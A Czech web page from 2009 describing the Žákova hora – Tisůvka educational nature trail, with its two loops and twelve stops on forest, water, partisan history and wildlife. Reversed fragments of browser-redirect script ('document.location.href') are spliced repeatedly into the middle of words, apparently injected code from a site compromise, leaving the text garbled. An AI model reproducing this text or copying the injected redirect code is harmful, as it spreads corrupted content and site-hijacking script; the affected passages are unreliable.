Rainbow page separator

NAUČNÁ STEZKA ŽÁKOVA HORA – TISŮVKA

Pátek, 2. října 2009

Naučná stezka Tisůvka – Žákova hora prochází centrálním hřebenem Žďárských vrchů.

zakova-hora-1Zavede Vás do pralesa, provede po partyzánských stezkách, seznámí se zdejší faunou a florou, ukáže jeden z pramenů Svratky, nabídne výhled z Čer[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova kamene na vrchu Tisůvce, … a samozřejmě prověří i vaši fyzickou zdatnost. Délka trasy je přibližně 10 km, má 12 zastavení a můžete si zvolit ze dvou okruhů. Doba obchůzky jednoho z okruhů činí asi dvě hodiny.

 Okruh Žákova hora

 1. Vodní poměry Žďárských vrchů – řeka Svratka odvodňuje část Žďárských vrchů na východ, Sázava odvádí vody na západ.
 2. Geodetický bod Žákova hora – slouží k vědeckým účelům při stanovení přesného tvaru Země a průzkumu pohybů zemské kůry.
 3. Milíř – železářství a sklářství bylo závislé na místních zdrojích surovin. Dřevěná polena se na vybraných místech skládala do milířů.
 4. Pohled do pralesa Žákova hora – názorná ukázka pralesa je vidět od té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to zastávky, vstup do něj je však zakázán. Do přirozeného vývoje lesa se nezasahuje, zbytky starých stromů se neodstraňují.
 5. Sražená voda – v lesnatých porostech vznikla na svazích četná prameniště různých typů. Kvůli potřebě většího proudu vody u vodních děl v Cikháji a Světnově tu byly do společné strouhy svedeny vody Svratky (teče do Černého moře) a Sázavy (její voda končí v Severním moři). Jednoduchým „šoupátkem“ si můžete vybrat, do kterého moře necháte vodu z obou řek odtékat.
 6. Obec Cikháj – o způsobu života si můžete udělat obrázek na základě informací z roku 1850, které jsou zde uvedeny.

zakova-hora-2

Okruh Tisůvka

 1. Partyzánské hnutí na Českomoravské vrchovině – v blízkosti trasy se nacházejí úkryty partyzánů z let II. svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové války.
 2. Lesy a lesní hospodářství – následky velké lesní kalamity, která oblast postihla v roce 1930, pomáhal zpracovávat údajně i po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomek Nikoly Šuhaje.
 3. Tes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovací úsek naučné stezky – na 700 m s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupání dosáhnete převýšení 92 m.
 4. Tisůvka (Čertův kámen) – chráněný přírodní výtvor, ukázka vrcholové skály, která vznikla při ústupu kontinentálního ledovce. Čertův kámen je opředen řadou pověstí.
 5. Ptáci jehličnatých lesů – nejhojnějšími druhy ptactva jsou pěnkava obecná, sýkora parukářka, linduška lesní nebo datel černý.
 6. Jelenářská oblast Žďárské vrchy – v období říje můžete slyšet troubení jelenů.

mapa